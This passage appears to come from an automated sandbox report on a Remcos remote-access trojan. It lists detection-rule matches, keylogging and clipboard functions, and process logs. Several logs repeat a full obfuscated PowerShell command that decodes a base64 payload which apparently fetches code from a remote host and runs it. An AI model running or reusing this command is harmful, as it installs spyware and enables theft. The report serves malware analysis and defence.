                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,27_2_004168C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,27_2_0040A3E0

                        E-Banking Fraud

Source: Yara match | File source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0041C9E2 SystemParametersInfoW
Source: powershell.exe | Process created: 42

                        System Summary

Source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B97078D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9B950F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00427A46
